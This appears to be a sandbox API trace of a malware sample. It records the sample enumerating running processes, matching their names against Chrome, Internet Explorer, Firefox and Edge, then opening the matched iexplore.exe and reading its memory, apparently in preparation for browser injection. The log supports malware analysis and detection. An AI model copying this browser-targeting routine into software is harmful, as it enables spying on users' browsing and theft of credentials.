	[0248.404] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.404] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0248.405] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x9b88
	[0248.405] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.405] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0248.405] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.405] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.405] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.405] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0248.406] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.406] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.406] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0248.407] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x9b8c
	[0248.407] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.407] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0248.407] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.407] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.408] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.408] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0248.408] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.408] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.408] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0248.409] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x9b90
	[0248.409] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.409] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0248.410] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.410] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.410] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.410] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0248.410] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.410] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.410] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0248.411] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x9b94
	[0248.411] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.411] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0248.412] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.412] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.412] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.412] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0248.412] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.412] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.413] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0248.413] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x9b98
	[0248.413] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.414] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0248.414] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.414] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.414] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.414] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0248.414] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.414] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.415] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0248.416] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x9b9c
	[0248.416] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.416] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0248.416] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.416] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.417] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.417] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0248.417] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.417] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.417] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0248.418] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x9ba0
	[0248.418] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.418] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0248.418] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.418] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.419] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.419] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0248.419] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.419] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.419] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0248.420] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0248.420] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0248.421] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x9ba4
	[0248.421] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.421] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0248.421] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.422] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.422] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.422] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0248.423] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.423] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.423] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0248.424] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x9ba8
	[0248.424] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.424] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0248.424] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.424] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.425] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.425] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0248.425] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.425] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.425] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0248.426] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x9bac
	[0248.426] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.426] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0248.426] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.426] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.427] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.427] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0248.427] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.427] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.427] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0248.428] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x9bb0
	[0248.428] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.428] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0248.428] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.428] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.429] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.429] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0248.429] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.429] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.429] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0248.430] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x9bb4
	[0248.430] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.430] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0248.432] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.432] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.432] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.432] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0248.433] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.433] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.433] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0248.434] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x9bb8
	[0248.434] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.434] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0248.434] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.434] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.434] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.434] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0248.435] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.435] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.435] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0248.436] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x9bbc
	[0248.436] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.436] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0248.436] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.436] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.437] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.437] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0248.437] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.437] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.437] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0248.438] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x9bc0
	[0248.438] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.438] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0248.439] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.439] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.440] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.440] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0248.440] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.440] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.440] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0248.441] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x9bc4
	[0248.441] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.441] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0248.442] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.442] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.442] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.442] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0248.442] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.442] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.442] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0248.443] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x9bc8
	[0248.443] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.443] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0248.443] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.443] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.444] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.444] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0248.444] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.444] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.444] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0248.445] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x9bcc
	[0248.445] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.445] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0248.446] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.446] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.449] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.449] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0248.449] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.449] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.449] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0248.450] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x9bd0
	[0248.450] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.450] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0248.451] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.451] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.452] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.452] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0248.452] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.452] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.453] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0248.453] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x9bd4
	[0248.454] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.454] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0248.454] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.454] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.455] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.455] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0248.455] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.455] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.455] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0248.456] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x9bd8
	[0248.456] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.456] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0248.457] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.457] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.458] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.458] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0248.458] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.458] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.459] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0248.460] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x9bdc
	[0248.460] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.460] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0248.460] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.461] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0248.461] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.461] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0248.461] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.461] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.462] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0248.463] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x9be0
	[0248.463] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.463] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0248.463] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.463] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0248.464] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.464] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0248.464] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0248.464] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0248.464] NtQueryInformationProcess (in: ProcessHandle=0x9be0, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0248.464] ReadProcessMemory (in: hProcess=0x9be0, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0248.464] ReadProcessMemory (in: hProcess=0x9be0, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0248.464] ReadProcessMemory (in: hProcess=0x9be0, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0248.465] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
